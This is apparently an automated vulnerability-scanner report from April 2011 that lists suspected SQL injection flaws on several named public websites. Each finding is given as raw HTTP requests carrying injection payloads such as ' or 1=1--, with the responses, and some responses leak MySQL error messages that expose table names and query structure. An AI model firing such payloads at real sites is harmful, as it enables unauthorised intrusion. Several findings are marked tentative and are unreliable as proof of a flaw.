XSS, Cross Site Scripting, DORK Report for April 1, 2011

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15683602'%20or%201%3d1--%20 and 15683602'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status15683602'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.almanac.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:02:04 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:02:04 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: SESS095d323cd8058abaa3a07a4ec41b18d5=aqdrue1g1femjn1184avvm59u0; expires=Mon, 25 Apr 2011 05:35:24 GMT; path=/; domain=.almanac.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Connection: keep-alive
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<me
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-9c5995c6232e15094ed8efbadb093bcd" value="form-9c5995c6232e15094ed8efbadb093bcd" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
<input type="hidden" name="default_text" id="edit-default-text" value="Keywords..." class="default-text" />
</div>

</div></form>
</div>
        <div id="my-account">
<a href="/user" title="My Account" class="button">My Account</a><a href="/user/register?destination=server-status15683602%27+or+1%3D1--+" title="New? Register">New? Register</a> | <a href="/user/login?destination=server-status15683602%27+or+1%3D1--+" title="Log In">Log In</a> </div>
</div><a href="http://twitter.com/almanac" target="_blank"><img class="twitter" src="/sites/new.almanac.com/themes/almanac960/images/t_small-a.png" alt="Follow the Almanac on Twitter" /></a>
       <a href="http://www.facebook.com/theoldfarmersalmanac" target="_blank"><img class="facebook" src="/sites/new.almanac.com/themes/almanac960/images/facebook-connect.png" alt="Become a Facebook Fan of the Almanac" /></a>
<a href="/content/rss"><img class="rss" src="/sites/new.almanac.com/themes/almanac960/images/rss-icon.png" alt="The Old Farmer's Almanac RSS Feed" /></a>
<a href="/store" class="shop">Shop</a> <a href="/store"><img class="cart" src="/sites/new.almanac.com/themes/almanac960/images/shopping-cart.png" alt="The Old Farmer's Almanac.com General Store" /></a>
<a onClick="_gaq.push(['_trackEvent', 'Web promo ad', 'Click Free 2 month LRW', 'LRWF']);" href="/weather/longrange">
<img class="lrweather" src="/sites/new.almanac.com/themes/almanac960/images/free-lrweather.png" alt="Free 2-Month Long-Range Weather" /></a>

<div id="site-header" class="clear-block">
<div id="branding" class="grid-4 imgfilter">

<div id="fb-like">
        <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.facebook.com/theoldfarmersalm
...[SNIP]...

Request 2

GET /server-status15683602'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.almanac.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:02:05 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:02:05 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: SESS095d323cd8058abaa3a07a4ec41b18d5=thrjklvktfllcbbrnrtksti2o0; expires=Mon, 25 Apr 2011 05:35:25 GMT; path=/; domain=.almanac.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Connection: keep-alive
Content-Length: 32343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<me
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-c33428d33a05097a7fac9f7ca4d293bd" value="form-c33428d33a05097a7fac9f7ca4d293bd" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
<input type="hidden" name="default_text" id="edit-default-text" value="Keywords..." class="default-text" />
</div>

</div></form>
</div>
        <div id="my-account">
<a href="/user" title="My Account" class="button">My Account</a><a href="/user/register?destination=server-status15683602%27+or+1%3D2--+" title="New? Register">New? Register</a> | <a href="/user/login?destination=server-status15683602%27+or+1%3D2--+" title="Log In">Log In</a> </div>
</div><a href="http://twitter.com/almanac" target="_blank"><img class="twitter" src="/sites/new.almanac.com/themes/almanac960/images/t_small-a.png" alt="Follow the Almanac on Twitter" /></a>
       <a href="http://www.facebook.com/theoldfarmersalmanac" target="_blank"><img class="facebook" src="/sites/new.almanac.com/themes/almanac960/images/facebook-connect.png" alt="Become a Facebook Fan of the Almanac" /></a>
<a href="/content/rss"><img class="rss" src="/sites/new.almanac.com/themes/almanac960/images/rss-icon.png" alt="The Old Farmer's Almanac RSS Feed" /></a>
<a href="/store" class="shop">Shop</a> <a href="/store"><img class="cart" src="/sites/new.almanac.com/themes/almanac960/images/shopping-cart.png" alt="The Old Farmer's Almanac.com General Store" /></a>
<a onClick="_gaq.push(['_trackEvent', 'Web promo ad', 'Click Free 2 month LRW', 'LRWF']);" href="/weather/longrange">
<img class="lrweather" src="/sites/new.almanac.com/themes/almanac960/images/free-lrweather.png" alt="Free 2-Month Long-Range Weather" /></a>

<div id="site-header" class="clear-block">
<div id="branding" class="grid-4 imgfilter">

<div id="fb-like">
        <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.facebook.com/theoldfarmersalm
...[SNIP]...

1.2. http://www.beeg.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beeg.com
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /favicon.ico' HTTP/1.1
Host: www.beeg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:13:59 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 303

DB Error: syntax errorSELECT * FROM `sellers_paysites` WHERE `Ps_Code` = 'favicon.ico'' AND `Name` = '' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''favicon.ico'' AND `Name` = ''' at line 1]

1.3. http://www.beeg.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beeg.com
Path:	/server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 307

DB Error: syntax errorSELECT * FROM `sellers_paysites` WHERE `Ps_Code` = 'server-status'' AND `Name` = '' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''server-status'' AND `Name` = ''' at line 1]

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:29 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 1832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

1.4. http://www.beeg.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beeg.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /server-status?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:26 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 296

DB Error: syntax errorSELECT * FROM `sellers_paysites` WHERE `Ps_Code` = 'server-status?1'=1' AND `Name` = '' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND `Name` = ''' at line 1]

Request 2

GET /server-status?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:27 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 1832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

1.5. http://www.comannet.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.comannet.com
Path:	/server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21186257'%20or%201%3d1--%20 and 21186257'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status21186257'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 02:40:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 353
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /server-status21186257' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

Request 2

GET /server-status21186257'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:40:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 349
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /server-status21186257' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

1.6. http://www.comannet.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.comannet.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 93324201%20or%201%3d1--%20 and 93324201%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?193324201%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 02:40:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 334
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /server-status
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

Request 2

GET /server-status?193324201%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:40:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 330
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /server-status was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

1.7. http://www.essortment.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.essortment.com
Path:	/server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Content-Length: 122
Server: TornadoServer/0.1
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 03:00:05 GMT
Connection: close

You don't even get a site specific 404: HTTP 500: Internal Server Error ({
"GrammarParsingError": "Invalid CQL : '"
})

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: TornadoServer/0.1
Date: Sat, 02 Apr 2011 03:00:05 GMT
Content-Length: 14756
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

1.8. http://www.excite.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.excite.com
Path:	/server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 86407274'%20or%201%3d1--%20 and 86407274'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status86407274'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.excite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:35:30 GMT
Server: Apache/1.3.20 (Unix) Resin/2.0.5
Pragma: no-cache
Cache-control: private
Expires: Sat 02 Apr 1977 17:15:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 89486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>

    <script>
   pageId=Math.round(Math.random() * 10000000000);
   randomNum = Math.round(Math.random() * 100
...[SNIP]...
<script type="text/javascript">
var moPstat=0 ;
var SP500_LAST = '1,252.31';
var SP500_NET_CHANGE = '<font color=black>0.00</font>';

var MKT_TIME = '12:30 pm ET, Real-Time';

</script>

<font class=modspace><br></font>



<script type="text/javascript">
var SPstatus = 1 ;
</script>
<script type="text/javascript">
var spPstat=0 ;
nfl_scores = new Array();
nfl_scores[0] = "10-SEP-09|1|Thursday|Sep. 10, 2009|Pittsburgh|Tennessee|20090910023|Pit|Ten|Pre-game|20|30||||||||20090910|12";
nfl_scores[1] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Atlanta|Miami|20090913001|Atl|Mia|Pre-game|13|0||||||||20090913|15";
nfl_scores[2] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Baltimore|Kansas City|20090913033|Bal|KC|Pre-game|13|0||||||||20090913|15";
nfl_scores[3] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Carolina|Philadelphia|20090913029|Car|Phi|Pre-game|13|0||||||||20090913|15";
nfl_scores[4] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cincinnati|Denver|20090913004|Cin|Den|Pre-game|13|0||||||||20090913|15";
nfl_scores[5] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cleveland|Minnesota|20090913005|Cle|Min|Pre-game|13|0||||||||20090913|15";
nfl_scores[6] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Houston|New York|20090913034|Hou|NYJ|Pre-game|13|0||||||||20090913|15";
nfl_scores[7] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Indianapolis|Jacksonville|20090913011|Ind|Jac|Pre-game|13|0||||||||20090913|15";
nfl_scores[8] = "13-SEP-09|1|Sunday|Sep. 13, 2009|New Orleans|Detroit|20090913018|NO|Det|Pre-game|13|0||||||||20090913|15";
nfl_scores[9] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Tampa Bay|Dallas|20090913027|TB|Dal|Pre-game|13|0||||||||20090913|15";
nfl_scores[10] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Arizona|San Francisco|20090913022|Ari|SF|Pre-game|16|15||||||||20090913|15";
nfl_scores[11] = "13-SEP-09|1|Sunday|Sep. 13, 2009|New York|Washington|20090913019|NYG|Was|Pre-game|16|15||||||||20090913|15";
nfl_scores[12] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Seattle|St. Louis|20090913026|Sea|
...[SNIP]...

Request 2

GET /server-status86407274'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.excite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:35:31 GMT
Server: Apache/1.3.20 (Unix) Resin/2.0.5
Pragma: no-cache
Cache-control: private
Expires: Sat 02 Apr 1977 17:15:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 90131

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>

    <script>
   pageId=Math.round(Math.random() * 10000000000);
   randomNum = Math.round(Math.random() * 100
...[SNIP]...
<script type="text/javascript">
var moPstat=0 ;
var DOW_SYMBOL = '<a href="http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=^INDU&alias=/alias/money/cm/qt"><font color=#0033cc>DOW</font></a>';
var DOW_LAST = '11,231.96';
var DOW_NET_CHANGE = '<font color=black>0.00</font>';
var NASDAQ_SYMBOL ='<a href="http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=^COMPX&alias=/alias/money/cm/qt"><font color=#0033cc>NASDAQ</font></a>';
var NASDAQ_LAST = '2,243.32';
var NASDAQ_NET_CHANGE = '<font color=black>0.00</font>';
var SP500_SYMBOL = '<a href="http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=^INX&alias=/alias/money/cm/qt"><font color=#0033cc>S&P 500</font></a>';
var SP500_LAST = '1,252.31';
var SP500_NET_CHANGE = '<font color=black>0.00</font>';

var MKT_TIME = '12:30 pm ET, Real-Time';

</script>

<font class=modspace><br></font>



<script type="text/javascript">
var SPstatus = 1 ;
</script>
<script type="text/javascript">
var spPstat=0 ;
nfl_scores = new Array();
nfl_scores[0] = "10-SEP-09|1|Thursday|Sep. 10, 2009|Pittsburgh|Tennessee|20090910023|Pit|Ten|Pre-game|20|30||||||||20090910|12";
nfl_scores[1] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Atlanta|Miami|20090913001|Atl|Mia|Pre-game|13|0||||||||20090913|15";
nfl_scores[2] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Baltimore|Kansas City|20090913033|Bal|KC|Pre-game|13|0||||||||20090913|15";
nfl_scores[3] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Carolina|Philadelphia|20090913029|Car|Phi|Pre-game|13|0||||||||20090913|15";
nfl_scores[4] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cincinnati|Denver|20090913004|Cin|Den|Pre-game|13|0||||||||20090913|15";
nfl_scores[5] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cleveland|Minnesota|20090913005|Cle|Min|Pre-game|13|0||||||||20090913|15";
nfl_scores[6] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Houston|New York|20090913034|Hou|NYJ|Pre-game|13|0||||||||20090913|15";
nfl_scores[7] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Indianapolis|Jacksonvi
...[SNIP]...

1.9. http://www.helium.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.helium.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19769932'%20or%201%3d1--%20 and 19769932'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?119769932'%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.helium.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:56:07 GMT
Server: Mongrel 1.1.3
Status: 404
Cache-Control: no-cache, max-age=3600
Content-Type: text/html; charset=utf-8
Content-Length: 14619
Set-Cookie: _helium_session=5edca78971d521c418cef18701baf2ba; path=/
Expires: Sat, 02 Apr 2011 03:56:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.helium.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http:
...[SNIP]...
<script>var tagOptions415 = new Object();
tagOptions415.rel = 'Stylesheet';
tagOptions415.type = 'text/css';
tagOptions415.media = 'screen, projection';
heWriteAbsoluteBrowserAwareStyleSheetLink('main_knowledge','http://assets%d.helium.com',tagOptions415) </script>
<script>var tagOptions656 = new Object();
tagOptions656.rel = 'Stylesheet';
tagOptions656.type = 'text/css';
tagOptions656.media = 'print';
heWriteAbsoluteBrowserAwareStyleSheetLink('print_knowledge','http://assets%d.helium.com',tagOptions656) </script>
<script>var tagOptions381 = new Object();
heWriteAbsoluteJavaScriptTag('adcode.js','http://assets%d.helium.com',tagOptions381) </script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8925353227623969");
GS_googleEnableAllServices();
</script>
<script type="text/javascript">
GA_googleUseIframeRendering();
</script>

<script type="text/javascript">
var HELAD_url_part_1 = "server-status?119769932'%20or%201%3d1--%20=1";
var HELAD_url_part_2 = "";
var adparams = new AdSales_pagesetup();
adparams.setPageName("cms_index");
</script>

</head>
<body>

<div id="bigWrapper">



<div id="topNav" class="noRelated">

   <div id="utilityNav">
<ul class="none">
<li><a href="http://video.helium.com" target="_top">Videos</a> |</li>

<li><a href="http://howto.helium.com" target="_top">How To Guides</a> |</li>
<li><a href="http://www.helium.com/content/helium-community" target="_top">Community</a></li>
</ul>

    <span id="loginStatus">


<a href="http://www.helium.com/users/my_account">My Helium</a> | <a href="http://www.helium.com/registration/signup" target="_top">Join</a> | <a href="http://www.helium.com/login?after_login=my_helium" target="_top">Log in</a>

...[SNIP]...

Request 2

GET /server-status?119769932'%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.helium.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:56:07 GMT
Server: Mongrel 1.1.3
Status: 404
Cache-Control: no-cache, max-age=3600
Content-Type: text/html; charset=utf-8
Content-Length: 14609
Set-Cookie: _helium_session=5edca78971d521c418cef18701baf2ba; path=/
Expires: Sat, 02 Apr 2011 03:56:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.helium.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http:
...[SNIP]...
<script>var tagOptions429 = new Object();
tagOptions429.rel = 'Stylesheet';
tagOptions429.type = 'text/css';
tagOptions429.media = 'screen, projection';
heWriteAbsoluteBrowserAwareStyleSheetLink('main_knowledge','http://assets%d.helium.com',tagOptions429) </script>
<script>var tagOptions0 = new Object();
tagOptions0.rel = 'Stylesheet';
tagOptions0.type = 'text/css';
tagOptions0.media = 'print';
heWriteAbsoluteBrowserAwareStyleSheetLink('print_knowledge','http://assets%d.helium.com',tagOptions0) </script>
<script>var tagOptions195 = new Object();
heWriteAbsoluteJavaScriptTag('adcode.js','http://assets%d.helium.com',tagOptions195) </script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascript">
